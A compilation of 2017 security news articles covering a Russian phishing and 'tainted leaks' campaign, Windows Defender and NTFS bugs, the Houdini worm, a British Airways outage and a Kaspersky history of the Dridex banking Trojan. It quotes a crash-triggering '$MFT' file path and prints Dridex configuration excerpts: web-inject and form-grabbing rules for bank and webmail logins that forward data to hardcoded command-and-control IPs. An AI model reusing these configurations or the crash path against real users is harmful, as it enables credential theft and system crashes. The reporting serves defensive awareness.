"It provides evidence of how documents stolen from a prominent journalist and critic of Russia was tampered with and then "leaked" to achieve specific propaganda aims," the researchers wrote.
Citizen Lab researchers said that the hackers abused Google's own services and used phishing emails to steal Gmail credentials from 218 targets across 39 countries, including former US defense officials, a former Russian prime minister, and Ukrainian military official.
Researchers detected the campaign in October 2016, but the attacks were going on for several months before that.
Phishing Attack Abuses Google's Own Service

The attackers sent phishing emails that looked almost identical to the security warnings from Google, alerting victims that someone had obtained their passwords and that they should change it right away.
But, as soon as the victims visited the link and entered their login details, the hackers gained access to their accounts.
The phishing link was convincing to trick victims into handing over their credentials to the attackers because the campaign was abusing Google AMP's open redirect and short URL service in combination to hide their phishing pages.
https://www.google.com/amp/tiny.cc/(redacted)
Which redirects to:
hxxp://myaccount.google.com-changepassword-securitypagesettingmyaccountgooglepagelogin.id833[.]ga/security/signinoptions/password
The above landing URL looks like a Google's password-reset page, which captures users credentials as soon as it is entered.
"After highlighting the similarities between this campaign and those documented by previous research, we round out the picture on Russia-linked operations by showing how related campaigns that attracted recent media attention for operations during the 2016 United States presidential election also targeted journalists, opposition groups, and civil society," Citizen Lab wrote.
Citizen Lab researchers able to identify the campaign after analyzing two phishing emails sent to David Satter, an American journalist and Kremlin critic, and who has been banned from the country in 2014.

Connection with DNC and French President Leak
According to the security firm, the approach and techniques used in the campaign appear similar to the hacking attempts that hit Hillary Clinton presidential campaign chairman John Podesta last year and the recent one that targeted French President Emmanuel Macron.
"In the 2017 French presidential election, tainted leaks appear to have been used in an attempt to discredit the political party and candidate for election directly," the researchers said.
US intelligence officials have previously discovered that Russian government was behind the attacks on Podesta and other Democratic officials. Now, Citizen Lab said Russian government was behind the recent phishing campaign and subsequent manipulation of Satter's e-mail.
Besides Satter, the same phishing campaign also targeted 218 other individuals, including politicians and other government officials, members of cabinets from Europe and Eurasia, journalists, academics, CEOs of energy and mining companies, UN officials, and high-ranking military personnel from more than a dozen countries, including the United States and NATO.
Tainted Leaks: A New Threat
CyberBerkut, a self-described pro-Russian group, published some of the documents obtained from Satter email accounts, one of which was so much manipulated that it made Satter appeared to be paying Russian journalists and activists to post articles critical of the Russian government, which would subsequently be published by several media outlets.
"Tainted leaks are a growing and particularly troublesome addition to disinformation tactics, and in the current digital environment are likely to become more prevalent," the Citizen Lab researchers concluded.
"Tainted leaks—fakes in a forest of facts—test the limits of how media, citizen journalism, and social media users handle fact checking, and the amplification of enticing, but questionable information."
So next time, when you came across any widespread data leak, just do not trust it blindly before the authenticity of those leaked documents is not proved.


Microsoft silently patched a second critical Malware Protection Engine flaw
29.5.2017 securityaffairs  Vulnerebility

Microsoft silently patched a second critical vulnerability in its Malware Protection Engine that was discovered on May 12.
Microsoft has patched the critical vulnerability in its Malware Protection Engine that was discovered on May 12 by the researchers at the Google’s Project Zero team.

The vulnerability could be exploited by an attacker that has crafted an executable that when processed by the Malware Protection Engine’s emulator could trigger the RCE flaw.

On May 9, Google’s Project Zero discovered another flaw, tracked as CVE-2017-0290, that was fixed with an emergency patch released just three days after its disclosure.

According to the Project Zero researcher Tavis Ormandy, unlike the CVE-2017-0290 vulnerability, this bug was a silent fix. Ormandy privately disclosed the vulnerability to Microsoft.

Follow
Tavis Ormandy ✔ @taviso
There is an undocumented opcode in the MsMpEng x86 emulator that can access internal emulator commands ¯\_(ツ)_/¯ https://bugs.chromium.org/p/project-zero/issues/detail?id=1260 …
7:12 PM - 25 May 2017
475 475 Retweets 641 641 likes
Twitter Ads info & Privacy
“MsMpEng includes a full system x86 emulator that is used to execute any untrusted files that look like PE executables. The emulator runs as NT AUTHORITY\SYSTEM and isn’t sandboxed,” Ormandy wrote. “Browsing the list of win32 APIs that the emulator supports, I noticed ntdll!NtControlChannel, an ioctl-like routine that allows emulated code to control the emulator.” reads the security advisory.

Malware Protection Engine flaw

The vulnerability recently patched is tied to the way the emulator processes files, meanwhile, the previous one was affecting the MsMpEng’s JavaScript interpreter.

The attacker can exploit the vulnerability to execute a number of control commands.

“Command 0x0C allows allows you to parse arbitrary-attacker controlled RegularExpressions to Microsoft GRETA (a library abandoned since the early 2000s). This library is not safe to process untrusted Regex, a testcase that crashes MsMpEng attached. Note that only packed executables can use RegEx, the attached sample was packed with UPX. ¯\_(ツ)_/¯
Command 0x12 allows you to load additional “microcode” that can replace opcodes. At the very least, there is an integer overflow calculating number of opcodes provided (testcase attached). You can also redirect execution to any address on a “trusted” page, but I’m not sure I understand the full implications of that.
Various commands allow you to change execution parameters, set and read scan attributes and UFS metadata (example attached). This seems like a privacy leak at least, as an attacker can query the research attributes you set and then retrieve it via scan result.” reads the advisory.
The vulnerability is difficult to exploit, even if MsMpEng isn’t sandboxed, many applications are sandboxed, this implies that the attacker needs to evade the sandbox to trigger the issue.

According to Ormandy, the emulator component emulates the client’s CPU, but Microsoft has given it an extra instruction that allows API calls. The hackers highlighted he was surprised finding a special set of instructions for the emulator.

Microsoft did not publish any security advisory for this vulnerability.


FileSystem NTFS Bug Crashes Windows 7 and Windows 8.1
29.5.2017 securityaffairs  Vulnerebility

A FileSystem NTFS Bug could be exploited to crash Windows 7 and Windows 8.1, using Chrome browser you can avoid problems.
Until Microsoft patches this problem, use Chrome: a slip in file-path handling allows an attacker to crash Windows 7 and Windows 8.1 with a file call.

A bug in the way Microsoft handle file-path could be exploited by attackers to crash Windows 7 and Windows 8.1 with a simple file call.

The vulnerability is triggered everytime a file call includes the Windows’ Master File Table, for example, if the attackers include $MFT as a link to an image in a website.

The Russian expert “Anatolymik” of Alladin Information Security first reported the issue. he discovered it debugging and reverse engineering the NTFS driver.

NTFS bug

Every file on an NTFS volume has a reference in the MFT, for this reason, the OS must protect $MFT from user-access. The Russian researcher discovered that if you try to access a file like

c:\$MFT\foo

the NT file system (NTFS) locks $MFT and simply doesn’t release it.

“When the attempt is made to open the file with respect to $ mft file, NtfsFindStartingNode function does not find it, because This function searches a little differently, unlike NtfsOpenSubdirectory function that finds the file at all times.” reads the desciption of the problem published by the expert.

“Consequently, the work cycle begins, starting with the root filesystem. Next NtfsOpenSubdirectory function opens the file and take him ERESOURCE monopoly. On the next iteration of the loop detects that the file is not a directory, and thus interrupt his job with an error. And at the conclusion of its work function by NtfsCommonCreate NtfsTeardownStructures function tries to close it. Function NtfsTeardownStructures, in turn, face the fact that she will not be able to close the file because it opens the file system itself when mounting. At the same time, contrary to expectations NtfsCommonCreate function, NtfsTeardownStructures function frees ERESOURCE $ mft file. Thus, it will be captured forever.”

According to Bleeping Computer, users who have tested the issue have noticed that the bug cannot be triggered in Chrome because the Google browser will not allow loading images with malformed paths, such as the $MFT exploit.

“According to users that have tested the bug and commented on Anatolymik’s blog post, Chrome will refuse to load images with malformed paths, such as the $MFT exploit.” states the blog post published on Bleeping Computer.

“Nonetheless, Bleeping Computer confirmed that the $MFT bug causes a Windows 7 installation to hang via Internet Explorer and Firefox.”

This NTFS bug is very similar to another file path vulnerability discovered in 1990s when you could trigger system crash with the “C:/con/con” bug. The bug affecting Windows 95 and Windows 98 systems.


Austrian parties SPÖ and ÖVP want Whatsapp monitoring
29.5.2017 securityaffairs BigBrothers

Austrian SPÖ and ÖVP parties are fighting for WhatsApp instant messaging and plan further measures to fight the terrorism.
Both the Austrian Social Democratic Party of Austria (SPÖ) and the Austrian People’s Party (Österreichische Volkspartei; ÖVP) are fighting for instant messaging monitoring such as WhatsApp.

The experts believe that the Government will end anonymous mobile phone SIM cards after the election.

The recent terrorist attack at the Manchester Arena is fueling the discussion about state surveillance measures adopted in Austria to fight terrorism in the country.

According to the director of the Federal Office for Constitutional Protection and Terrorism, Peter Gridling, there is the concrete risk for an imminent attack.

“Concrete suspicious moments” for an imminent terrorist attack in Austria so far.” said Gridling on Friday evening in “ZiB2.

“The BAT director described it as an “illusion to believe that one succeeds in keeping 300 people around the clock under observation” “Priorities should be set. This could lead to situations where people classified as marginalized persons (…) are seen to be important actors, “he said, referring to the Manchester terrorist attack.”

Whatsapp monitoring surveillance

The ÖVP Chief Sebastian Kurz is urging an additional effort of law enforcement and intelligence agencies against terrorists. In March, the ÖVP presented a follow-up to the previous data retention and proposed an update to the law to allow the monitoring Whatsapp and Skype.

“We are waiting until now for a release to take the further steps to the implementation,” said Brandstetter spokesman Jim Lefebre to the STANDARD. SPÖ spokesman Johannes Jarolim was surprised at the statements.

SPÖ spokesman Johannes Jarolim was surprised at the statements.

The government has already approved a security package that may address Skype and Whatsapp monitoring without a Bundestrojaner that is the term used to indicate state-sponsored troja, aka Federal Trojan.

“Without the help of a Bundestrojaner, as Brandstetter has announced,” Jarolim said.

The principal problem is the impossibility in spying on end-to-end encrypted communications without the use of surveillance software of the presence of a backdoor in the encryption algorithms.

In Germany, authorities leverage on state surveillance software that is secretly installed on mobile devices to monitor the activities of the suspects and exfiltrate data.

Vice Chancellor Brandstetter assumes that Whatsapp users can be monitored that can be acquired with an international tender.

On the market, there are a number of applications that can be used to access Whatsapp chats from backups, one of them is the Elcomsoft Explorer for WhatsApp, but they can not be used to access communication in real-time.

Another measure under discussion that could be included in the security package is the regulation regarding an end of anonymous mobile SIM cards.

While SPÖ and ÖVP already agreed in extending monitoring methods, the parties are negotiating for the end of anonymous mobile SIM cards.

“The plans came from Interior Minister Wolfgang Sobotka (ÖVP) and Hans Peter Doskozil (SPÖ), who agreed on fewer negotiating hours.” reported the Austrian agency Derstandard.at.


Houdini Worm Gets Posted to Paste Sites

28.5.2017 seucityweek Virus
Recorded Future security researchers recently discovered that the Houdini worm has been posted hundreds of times on paste sites over the past several months.

Also known as H-Worm, Houdini has been around since 2013, and was said in 2014 to have been created by Naser Al Mutairi from Kuwait. Later that year, the malware was reportedly used in APT campaigns in the Asia-Pacific region, while last year it was associated with the Moonlight espionage campaign targeting the Middle East.

Earlier this year, after noticing an increase in malicious Visual Basic scripts (VBscript) posted on paste sites, Recorded Future had a closer look into the matter and discovered that most of the scripts were Houdini. Moreover, a single actor was found to be partially responsible for the identified malicious VBscripts posted on said sites.

“The individual(s) reusing this Houdini VBscript are continually updating with new command and control servers,” Recorded Future’s Daniel Hatheway explains in a blog post.

Analysis of the script variants revealed not only that they could connect to the defined command and control (C&C) server, but also that, after establishing connection, the malware would copy itself to a directory and then create a registry key in a startup location to achieve persistence.

Overall, the security researchers discovered a total of 213 posts to paste sites as of April 26. These included 105 unique subdomains, 1 domain, and 190 hashes. Thus, they concluded that some of the posts were exact matches, while others used the same domain but contained other changes within the VBscript.

Further analysis revealed that the domains and subdomains used are from a dynamic DNS provider, and that some of the active malware samples would communicate to at least one of the paste sites, in addition to the host defined in one of the VBscript.

The subdomains registered at a dynamic DNS provider didn’t prove helpful in terms of registration data, but one domain, microsofit[.]net, helped the researchers determine that the individual registering the domain used the name “Mohammed Raad.” The actor also used the email “vicsworsbaghdad@gmail.com” and set Germany as their country.

While the Houdini posts on paste sites were published from guest accounts and couldn’t be tied to a single person, the subdomains associated with the VBscripts appeared to be a play on the name “Mohammed Raad,” thus linking the malware to the microsofit[.]net domain.

“A Google search on “Mohammed Raad” revealed a Facebook profile of an individual who claims to be part of “Anonymous,” from Germany, and uses “Vicswors Baghdad” as an alias. This profile is identical to the registration information from microsofit[.]net,” Hatheway notes.

What’s more, the Facebook profile was found to display a recent conversation pertaining to an open source ransomware called “MoWare H.F.D”. Thus, the researcher concluded that the same actor might be studying, testing, and possibly configuring the ransomware.

A closer look at the screenshot posted on the “vicsworsbaghdad” Facebook profile revealed that the ransomware is available by commenting on the creator's YouTube video. Next, the security researcher discovered that an account “Vicswors Baghdad” commented asking for information about the download.

The account, Hatheway says, uses the same email “vicsworsbaghdad@gmail.com” as the registration of microsofit[.]net. Moreover, the researcher discovered a profile for “Vicswors Baghdad” on 0day[.]today, but no activity was associated with it.


British Airways cancels thousands of flights, there is no evidence of cyber-attacks
28.5.2017 seucityaffairs Cyber

British Airways cancels all flights from Gatwick and Heathrow due to IT failure, company operations worldwide suffered severe delays.
In the last 24 hours, British Airways has canceled all flights from Gatwick and Heathrow and flights worldwide suffered major delays due to a severe IT failure.

Global operations were affected and while I’m writing the company it trying to restore them.

An IT problem appears to be the root cause of the decision to cancel all flights from both airports before 6 pm UK time on Saturday.
The system failure affected the principal systems used by British Airways, including the booking system, baggage handling, mobile phone apps and check-in desks.

“Following the major IT system failure experienced earlier today, with regret we have had to cancel all flights leaving from Heathrow and Gatwick for the rest of Saturday,” a spokeswoman said.

“We are working hard to get our customers who were due to fly today on to the next available flights over the course of the rest of the weekend. Those unable to fly will be offered a full refund.”
British Airways

More than 1,000 flights were affected, scenes of panic and confusion were observed in the airports, travelers complained that they had been left in the dark.

“More than 1,000 flights were affected. At Heathrow alone, BA had 406 flights scheduled to depart after 9am and a further 71 at Gatwick, according to flightstats.com on Saturday.” reported The Guardian.

“We are extremely sorry for the huge inconvenience this is causing our customers and we understand how frustrating this must be, especially for families hoping to get away on holiday.” said Chief executive Alex Cruz.

The airline’s Twitter account was the constantly updated about the situation, the company told the travelers to don’t go to the airport unless they have a confirmed booking for travel.

While the airports were paralyzed, rumors of a cyber attack were circulating on the Internet, recent massive WannaCry ransomware attack demonstrated the fragility of computer systems worldwide.

British Airways promptly denied this thesis.

“We’ve found no evidence that it’s a cyber-attack.” said the company.


Sean Robinson @SeanRobinsonUU
BA: "We've found no evidence that it's a cyber attack."
4:55 PM - 27 May 2017
1 1 Retweet likes
Twitter Ads info & Privacy
According to the GMB union, such kind of problems is caused by the policy of the company to outsource hundreds of IT jobs to India.
Passengers have suffered serious problems on Friday due to a failure of the baggage system.

Passengers departing from the EU have some rights under EU law to claim compensation for delayed or canceled flights.

Airlines are required to give passengers food and drinks for delays of more than two hours, they have to provide also hotel accommodation for overnight delays and transfers.


Tainted Leaks – Widespead Russia’s disinformation campaign hit 39 Countries
28.5.2017 seucityaffairs CyberSpy

Researchers at Citizen Lab documented a Russia’s campaign of cyberespionage and disinformation that leveraged tainted leaks.
According to the researchers at the Citizen Lab at the University of Toronto, a Russian disinformation campaign targeted 39 countries.

The cyber attacks against the DNC were part of a larger campaign orchestrated by a nation state actor against government, military and industry targets, journalists, academics, opposition figures, and activists.

“Our report uncovers a major disinformation and cyber espionage campaign with hundreds of targets in government, industry, military and civil society. Those targets include a large list of high profile individuals from at least 39 countries (including members of 28 governments), as well as the United Nations and NATO.” wrote lead researcher Ronald Deibert.” Although there are many government, military, and industry targets, our report provides further evidence of the often-overlooked targeting of civil society in cyber espionage campaigns. Civil society — including journalists, academics, opposition figures, and activists — comprise the second largest group (21%) of targets, after government.”

Below a list of notable targets shared by the researchers:

A former Russian prime minister
A former U.S. Deputy Under Secretary of Defense and a former senior director of the U.S. National Security Council
The Austrian ambassador to a Nordic country and the former ambassador to Canada for a Eurasian country
Senior members of the oil, gas, mining, and finance industries of the former Soviet states
United Nations officials
Military personnel from Albania, Armenia, Azerbaijan, Georgia, Greece, Latvia, Montenegro, Mozambique, Pakistan, Saudi Arabia, Sweden, Turkey, Ukraine, and the United States, as well as NATO officials
Politicians, public servants and government officials from Afghanistan, Armenia, Austria, Cambodia, Egypt, Georgia, Kazakhstan, Kyrgyzstan, Latvia, Peru, Russia, Slovakia, Slovenia, Sudan, Thailand, Turkey, Ukraine, Uzbekistan and Vietnam
According to Deibert, Russian threat actors launched a large-scale campaign aimed to obtain credentials and sensitive files from the victims. The state-sponsored hackers used stolen data in carefully tainted leaks created by mixing real and false information to influence the sentiment of a portion of individuals on specific facts.

“Fake information scattered amongst genuine materials — “falsehoods in a forest of facts” as Citizen Lab’s John Scott-Railton referred to them — is very difficult to distinguish and counter, especially when it is presented as a salacious “leak” integrated with what otherwise would be private information.” Deibert said.

“Russia has a long history of experience with what is known as ‘dezinformatsiya,’ going back even to Soviet times,”

“Tainted leaks, such as those analyzed in our report, present complex challenges to the public. Fake information scattered amongst genuine materials — ‘falsehoods in a forest of facts’… is very difficult to distinguish and counter, especially when it is presented as a salacious ‘leak’ integrated with what otherwise would be private information.”

Citizen Lab links the campaign to the Russian government confirming the findings of many other reports published by security firms and intelligence agencies.

Among the victims, there is also the US journalist David Satter, who has written a lot on the corruption of politicians and entrepreneurs in Russia.

Once hackers have stolen the Satter’s e-mails they have “selectively modified” them and then “leaked” to support the thesis that he was part of a CIA-backed plot to discredit Russian President Vladimir Putin.

“Following the compromise of his account, Satter’s stolen e-mails were selectively modified, and then “leaked” on the blog of CyberBerkut, a self-described pro-Russian hacktivist group. This report introduces the term “tainted leaks” to describe the deliberate seeding of false information within a larger set of authentically stolen data.” reads the report.

According to Citizen Lab tainted leaks were used also to target officials from Afghanistan, Armenia, Austria, Cambodia, Egypt, Georgia, Kazakhstan, Kyrgyzstan, Latvia, Peru, Russia, Slovakia, Slovenia, Sudan, Thailand, Turkey, Ukraine, Uzbekistan, and Vietnam, according to the report.

Tainted Leaks Map-of-target-countries-4-768x517

Below key findings of the report:

Documents stolen from a prominent journalist and critic of the Russian government were manipulated and then released as a “leak” to discredit domestic and foreign critics of the government. We call this technique “tainted leaks.”
The operation against the journalist led us to the discovery of a larger phishing operation, with over 200 unique targets spanning 39 countries (including members of 28 governments). The list includes a former Russian Prime Minister, members of cabinets from Europe and Eurasia, ambassadors, high ranking military officers, CEOs of energy companies, and members of civil society.
After government targets, the second largest set (21%) are members of civil society including academics, activists, journalists, and representatives of non-governmental organizations.
We have no conclusive evidence that links these operations to a particular Russian government agency; however, there is clear overlap between our evidence and that presented by numerous industry and government reports concerning Russian-affiliated threat actors.


Dridex: A History of Evolution
28.5.2017 Kaspersky Virus

The Dridex banking Trojan, which has become a major financial cyberthreat in the past years (in 2015, the damage done by the Trojan was estimated at over $40 million), stands apart from other malware because it has continually evolved and become more sophisticated since it made its first appearance in 2011. Dridex has been able to escape justice for so long by hiding its main command-and-control (C&C) servers behind proxying layers. Given that old versions stop working when new ones appear and that each new improvement is one more step forward in the systematic development of the malware, it can be concluded that the same people have been involved in the Trojan’s development this entire time. Below we provide a brief overview of the Trojan’s evolution over six years, as well as some technical details on its latest versions.

Dridex: A History of Evolution

How It All Began

Dridex made its first appearance as an independent malicious program (under the name “Cridex”) around September 2011. An analysis of a Cridex sample (MD5: 78cc821b5acfc017c855bc7060479f84) demonstrated that, even in its early days, the malware could receive dynamic configuration files, use web injections to steal money, and was able to infect USB media. This ability influenced the name under which the “zero” version of Cridex was detected — Worm.Win32.Cridex.

That version had a binary configuration file:

Dridex: A History of Evolution

Sections named databefore, datainject, and dataafter made the web injections themselves look similar to the widespread Zeus malware (there may have been a connection between this and the 2011 Zeus source code leak).

Cridex 0.77–0.80

In 2012, a significantly modified Cridex variant (MD5: 45ceacdc333a6a49ef23ad87196f375f) was released. The cybercriminals had dropped functionality related to infecting USB media and replaced the binary format of the configuration file and packets with XML. Requests sent by the malware to the C&C server looked as follows:

<message set_hash=”” req_set=”1″ req_upd=”1″>
<header>
<unique>WIN-1DUOM1MNS4F_A47E8EE5C9037AFE</unique>
<version>600</version>
<system>221440</system>
<network>10</network>
</header>
<data></data>
</message>
1
2
3
4
5
6
7
8
9
<message set_hash=“” req_set=“1” req_upd=“1”>
<header>
<unique>WIN–1DUOM1MNS4F_A47E8EE5C9037AFE</unique>
<version>600</version>
<system>221440</system>
<network>10</network>
</header>
<data></data>
</message>
The <message> tag was the XML root element. The <header> tag contained information about the system, bot identifier, and the version of the bot.

Here is a sample configuration file:

<packet><commands><cmd id=”1354″ type=”3″><httpinject><conditions><url type=”deny”>\.(css|js)($|\?)</url><url type=”allow” contentType=”^text/(html|plain)”><![CDATA[https://.*?\.usbank\.com/]]></url></conditions><actions><modify><pattern><![CDATA[<body.*?>(.*?)]]></pattern><replacement><![CDATA[<link href=”https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/base/jquery-ui.css” rel=”stylesheet” type=”text/css”/>
<style type=”text/css”>
.ui-dialog-titlebar{ background: white }
.text1a{font-family: Arial; font-size: 10px;}
1
2
3
4
<packet><commands><cmd id=“1354” type=“3”><httpinject><conditions><url type=“deny”>\.(css|js)($|\?)</url><url type=“allow” contentType=“^text/(html|plain)”><![CDATA[https://.*?\.usbank\.com/]]></url></conditions><actions><modify><pattern><![CDATA[<body.*?>(.*?)]]></pattern><replacement><![CDATA[<link href=”https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/base/jquery-ui.css” rel=”stylesheet” type=”text/css”/>
<style type=“text/css”>
.ui–dialog–titlebar{ background: white }
.text1a{font–family: Arial; font–size: 10px;}
With the exception of the root element <packet>, the Dridex 0.8 configuration file remained virtually unchanged until version 3.0.

Dridex 1.10

The “zero” version was maintained until June 2014. A major operation (Operation Tovar) to take down another widespread malicious program — Gameover Zeus — was carried out that month. Nearly as soon as Zeus was taken down, the “zero” version of Cridex stopped working and Dridex version 1.100 appeared almost exactly one month afterward (on June 22).

Dridex: A History of Evolution

Sample configuration file:

<root>
<settings hash=”65762ae2bf50e54757163e60efacbe144de96aca”>
<httpshots>
<url type=”deny” onget=”1″ onpost=”1″>\.(gif|png|jpg|css|swf|ico|js)($|\?)</url>
<url type=”deny” onget=”1″ onpost=”1″>(resource\.axd|yimg\.com)</url>
</httpshots>
<formgrabber>
<url type=”deny”>\.(swf)($|\?)</url><url type=”deny”>/isapi/ocget.dll</url>
<url type=”allow”>^https?://aol.com/.*/login/</url>
<url type=”allow”>^https?://accounts.google.com/ServiceLoginAuth</url>
<url type=”allow”>^https?://login.yahoo.com/</url>

<redirects>
<redirect name=”1st” vnc=”0″ socks=”0″ uri=”http://81.208.13.10:8080/injectgate” timeout=”20″>twister5.js</redirect>
<redirect name=”2nd” vnc=”1″ socks=”1″ uri=”http://81.208.13.10:8080/tokengate” timeout=”20″>mainsc5.js</redirect>
<redirect name=”vbv1″ vnc=”0″ socks=”0″ postfwd=”1″ uri=”http://23.254.129.192:8080/logs/dtukvbv/js.php” timeout=”20″>/logs/dtukvbv/js.php</redirect>
<redirect name=”vbv2″ vnc=”0″ socks=”0″ postfwd=”1″ uri=”http://23.254.129.192:8080/logs/dtukvbv/in.php” timeout=”20″>/logs/dtukvbv/in.php</redirect>
</redirects>
<httpinjects>
<httpinject><conditions>
<url type=”allow” onpost=”1″ onget=”1″ modifiers=”U”><![CDATA[^https\://.*/tdsecure/intro\.jsp.*]]></url>
<url type=”deny” onpost=”0″ onget=”1″ modifiers=””>\.(gif|png|jpg|css|swf)($|\?)</url>
</conditions>
<actions>
<modify><pattern modifiers=”msU”><![CDATA[onKeyDown\=”.*”]]></pattern><replacement><![CDATA[onKeyDown=””]]></replacement></modify>
<modify><pattern modifiers=”msU”><![CDATA[(\<head.*\>)]]></pattern><replacement><![CDATA[\1<style type=”text/css”>
body {visibility: hidden; }
</style>

1
<root>
<settings hash=“65762ae2bf50e54757163e60efacbe144de96aca”>
<httpshots>
<url type=“deny” onget=“1” onpost=“1”>\.(gif|png|jpg|css|swf|ico|js)($|\?)</url>
<url type=“deny” onget=“1” onpost=“1”>(resource\.axd|yimg\.com)</url>
</httpshots>
<formgrabber>
<url type=“deny”>\.(swf)($|\?)</url><url type=“deny”>/isapi/ocget.dll</url>
<url type=“allow”>^https?://aol.com/.*/login/</url>
<url type=“allow”>^https?://accounts.google.com/ServiceLoginAuth</url>
<url type=“allow”>^https?://login.yahoo.com/</url>
...
<redirects>
<redirect name=“1st” vnc=“0” socks=“0” uri=“http://81.208.13.10:8080/injectgate” timeout=“20”>twister5.js</redirect>
<redirect name=“2nd” vnc=“1” socks=“1” uri=“http://81.208.13.10:8080/tokengate” timeout=“20”>mainsc5.js</redirect>
<redirect name=“vbv1” vnc=“0” socks=“0” postfwd=“1” uri=“http://23.254.129.192:8080/logs/dtukvbv/js.php” timeout=“20”>/logs/dtukvbv/js.php</redirect>
<redirect name=“vbv2” vnc=“0” socks=“0” postfwd=“1” uri=“http://23.254.129.192:8080/logs/dtukvbv/in.php” timeout=“20”>/logs/dtukvbv/in.php</redirect>
</redirects>
<httpinjects>
<httpinject><conditions>
<url type=“allow” onpost=“1” onget=“1” modifiers=“U”><![CDATA[^https\://.*/tdsecure/intro\.jsp.*]]></url>
<url type=“deny” onpost=“0” onget=“1” modifiers=“”>\.(gif|png|jpg|css|swf)($|\?)</url>
</conditions>
<actions>
<modify><pattern modifiers=“msU”><![CDATA[onKeyDown\=“.*”]]></pattern><replacement><![CDATA[onKeyDown=“”]]></replacement></modify>
<modify><pattern modifiers=“msU”><![CDATA[(\<head.*\>)]]></pattern><replacement><![CDATA[\1<style type=”text/css”>
body {visibility: hidden; }
</style>
...
This sample already has redirects for injected .js scripts that are characteristic of Dridex.

Here is a comparison between Dridex and Gameover Zeus injections:

Dridex: A History of Evolution

Thus, the takedown of one popular botnet (Gameover Zeus) led to a breakthrough in the development of another, which had many strong resemblances to its predecessor.

We mentioned above that Dridex had begun to use PCRE, while its previous versions used SLRE. Remarkably, the only other banking malware that also used SLRE was Trojan-Banker.Win32.Shifu. That Trojan was discovered in August 2015 and was distributed through spam via the same botnets as Dridex. Additionally, both banking Trojans used XML configuration files.

We also have reasons to believe that, at least in 2014, the cybercriminals behind Dridex were Russian speakers. This is supported by comments in the command & control server’s source code:

Dridex: A History of Evolution

And by the database dumps:

Dridex: A History of Evolution

Dridex: from Version 2 to Version 3

By early 2015, Dridex implemented a kind of P2P network, which is also reminiscent of the Gameover Zeus Trojan. On that network, some peers (supernodes) had access to the C&C and forwarded requests from other network nodes to it. The configuration file was still stored in XML format, but it got a new section, <nodes>, which contained an up-to-date peer list. Additionally, the protocol used for communication with the C&C was encrypted.

Dridex: from Version 3 to Version 4

One of the administrators of the Dridex network was arrested on August 28, 2015. In the early days of September, networks with identifiers 120, 200, and 220 went offline. However, they came back online in October and new networks were added: 121, 122, 123, 301, 302, and 303.

Notably, the cybercriminals stepped up security measures at that time. Specifically, they introduced geo-filtering wherein an IP field appeared in C&C request packets, which was then used to identify the peer’s country. If it was not on the list of target countries, the peer received an error message.

In 2016, the loader became more complicated and encryption methods were changed. A binary loader protocol was introduced, along with a <settings> section, which contained the configuration file in binary format.

Dridex 4.x. Back to the Future

The fourth version of Dridex was detected in early 2017. It has capabilities similar to the third version, but the cybercriminals stopped using the XML format in the configuration file and packets and went back to binary. The analysis of new samples is rendered significantly more difficult by the fact that the loader now works for two days, at most. This is similar to Lurk, except that Lurk’s loader was only active for a couple of hours.

Analyzing the Loader’s Packets

The packet structure in the fourth version is similar to those in the late modifications of the loader’s 3.x versions. However, the names of the modules requested have been replaced with hashes:

Dridex: A History of Evolution

Here is the function that implements C&C communication and uses these hashes:

Dridex: A History of Evolution

Knowing the packet structure in the previous version, one can guess which hash relates to which module by comparing packets from the third and fourth versions.

In the fourth version of Dridex, there are many places where the CRC32 hashing algorithm is used, including hashes used to search for function APIs and to check packet integrity. It would make sense for hashes used in packets to be none other than CRC32 of requested module names. This assumption can easily be verified by running the following Python code:

Dridex: A History of Evolution

That’s right – the hashes obtained this way are the same as those in the program’s code.

With regards to encryption of the loader’s packets, nothing has changed. As in Dridex version 3, the RC4 algorithm is used, with a key stored in encrypted form in the malicious program’s body.

One more change introduced in the fourth version is that a much stricter loader authorization protocol is now used. A loader’s lifespan has been reduced to one day, after which encryption keys are changed and old loaders become useless. The server responds to requests from all outdated samples with error 404.

Analysis of the Bot’s Protocol and Encryption

Essentially, the communication of Dridex version 4 with its C&C is based on the same procedure as before, with peers still acting as proxy servers and exchanging modules. However, encryption and packet structure have changed significantly; now a packet looks like the <settings> section from the previous Dridex version. No more XML.

Dridex: A History of Evolution

The Basic Packet Generation function is used to create packets for communication with the C&C and with peers. There are two types of packets for the C&C:

Registration and transfer of the generated public key
Request for a configuration file
The function outputs the following packet:

Dridex: A History of Evolution

A packet begins with the length of the RC4 key (74h) that will be used to encrypt strings in that packet. This is followed by two parts of the key that are the same size. The actual key is calculated by performing XOR on these blocks. Next comes the packet type (00h) and encrypted bot identifier.

Peer-to-Peer Encryption

Sample encrypted P2P packet:

Dridex: A History of Evolution

The header of a P2P packet is a DWORD array, the sum of all elements in which is zero. The obfuscated data size is the same as in the previous version, but the data is encrypted differently:

Dridex: A History of Evolution

The packet begins with a 16-byte key, followed by 4 bytes of information about the size of data encrypted with the previous key using RC4. Next comes a 16-byte key and data that has been encrypted with that key using RC4. After decryption we get a packet compressed with gzip.

Peer to C&C Encryption

As before, the malware uses a combination of RSA, RC4 encryption, and HTTPS to communicate with the C&C. In this case, peers work as proxy servers. An encrypted packet has the following structure: 4-byte CRC, followed by RSA_BLOB. After decrypting RSA (request packets cannot be decrypted without the C&C private key), we get a GZIP packet.

Configuration File

We have managed to obtain and decrypt the configuration file of botnet 222:

Dridex: A History of Evolution

It is very similar in structure to the <settings> section from the previous version of Dridex. It begins with a 4-byte hash, which is followed by the configuration file’s sections.

struct DridexConfigSection {
BYTE SectionType;
DWORD DataSize;
BYTE Data[DataSize];
};
1
2
3
4
5
struct DridexConfigSection {
BYTE SectionType;
DWORD DataSize;
BYTE Data[DataSize];
};
The sections are of the same types as in <settings>:

01h – HttpShots
02h – Formgrabber
08h – Redirects
etc.
The only thing that has changed is the encryption of strings in the configuration file – RC4 is now used.

struct EncryptedConfigString{
BYTE RC4Key1[16]; // Size’s encryption key
DWORD EncryptedSize;
BYTE RC4Key2[16]; // Data’s encryption key
BYTE EncryptedData[Size];
};
1
2
3
4
5
6
struct EncryptedConfigString{
BYTE RC4Key1[16]; // Size’s encryption key
DWORD EncryptedSize;
BYTE RC4Key2[16]; // Data’s encryption key
BYTE EncryptedData[Size];
};
RC4 was also used to encrypt data in p2p packets.

Geographical Distribution

Dridex: A History of Evolution

